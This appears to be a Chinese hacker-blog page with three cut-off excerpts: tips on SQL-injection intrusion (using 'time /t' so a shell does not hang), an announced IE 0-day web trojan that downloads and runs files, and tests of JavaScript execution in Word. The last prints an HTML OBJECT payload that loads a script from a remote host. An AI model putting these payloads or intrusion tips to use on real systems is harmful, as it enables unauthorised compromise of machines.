我在入侵过程中注意到的细节(一)
作者:lcx
来源:vbs小铺
《黑客手册200801》
我在入侵过程中注意到的细节(一)
lcx
细节决定成败,不但对于写程序、渗透入侵甚至人生都是如此。谈人生就有点深奥了,还是来谈谈入侵吧。记得很久前有一位同事,注入的时候,在sa权限什么命令都能执行的情况下竟然入侵花费了三天左右的时间,为什么呢?这是因为他在NBSI下输了个time命令,想看下服务器的时间,结果命令无法应答,注入点宕在哪儿了,再也没办法执行其它命令了,直到服务器重启。有的写的不好的木马,如果执行time命令也会自动退出。如果注意到了这个细节的话,最好的执行办法就是time /t。
这一期我不谈注入,针对我在内网入侵的经验,来谈一下细节吧。
阅读全文 »
IE0DAY网马
鬼仔注:这个漏洞。
这个漏洞参考http://www.milw0rm.com/exploits/5619
Author: Greysign
2008-5-24
http://www.scanw.com/blog
哈哈。标题吸引吗。
修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。
阅读全文 »
对MS word javascript execution的一些测试
作者:余弦
来源:0×37 Security
Microsoft word javascript execution原文:http://marc.info/?l=bugtraq&m=121121432823704&w=2,hi群内讨论过。可以得出一些结论:
1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能,使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code:
<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('<script src=http://www.0x37.com/doc.js></script>')"></OBJECT>
这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。
阅读全文 »